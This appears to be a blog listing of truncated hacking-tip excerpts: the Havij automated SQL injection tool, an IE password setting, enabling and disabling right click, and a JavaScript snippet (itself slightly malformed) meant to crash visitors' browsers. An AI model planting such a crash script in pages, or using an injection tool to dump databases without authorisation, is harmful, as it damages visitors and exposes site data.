Havij Tool – Automatic SQL Injection Process

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, […]

How to Auto Save Passwords Without Notification in IE

This brief tutorial will show you how to save your passwords and username automatically, without this annoying notification! 1. Click Tools.2. Click Internet Options.3. Select the Content tab.4. Under the Autocomplete section, click Settings.5. At this point, the Auto Complete settings Dialog box will popup. Untick the Prompt me to save passwords check box.6. Click […]

Hack to Enable Right Click in Websites

Is your favorite website disabled the right click button? No need to worry.  you can enable the Right Click button after reading this article. There are different tools  for disabling the javascript.   But i will introduce again my favorite and best web delveloper tool for you.  This is one of best tool for hackers. Download […]

How to to disable right click using javascript?

I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript. Code to disable: oncontextmenu=”alert(‘right click is disable’);return false;” now you may have doubt about placing this javascript code. This code should be in body as one of the attribute. I […]

Crashing Client’s Browser with Javascript

Hi this is very simple javascript code to crash the client browser. If you don’t know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there). <script type=’javascript’>function crash(){while(1==1){location.reload(true);}</script> This code will reload the page again and again for infintive time and crash the browser. How to use it?  Paste the above code in header […]